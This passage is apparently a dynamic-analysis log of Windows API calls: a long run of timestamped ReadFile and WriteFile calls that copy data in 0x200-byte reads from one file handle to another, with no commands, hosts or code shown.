lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.106] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.106] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.107] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.107] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x301, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.108] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.108] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.109] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.109] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.110] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.110] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.111] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.111] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.112] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.112] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.112] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.113] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.113] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.114] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.114] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.115] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.115] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.116] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x246, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.116] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.117] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.117] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.118] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.118] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.119] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.119] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.119] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.120] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.120] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.121] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.121] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.123] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.123] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.124] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.124] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.125] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.125] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x257, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.126] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.126] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.126] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.127] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.127] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.128] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.128] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.129] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.129] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.130] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.130] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.131] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.131] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.132] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.132] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.133] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.133] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.134] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.134] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.135] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.135] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.136] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.136] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.136] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.137] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.137] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.138] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.138] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.139] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.139] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.140] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.140] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.141] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.141] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.142] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.142] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.142] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.143] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x247, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.143] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.144] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.144] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.145] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.145] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.146] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.146] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.147] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.147] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.148] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2aa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.148] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.149] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.149] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.150] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.150] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.151] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.151] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.151] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.152] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.152] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.153] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.153] WriteFile 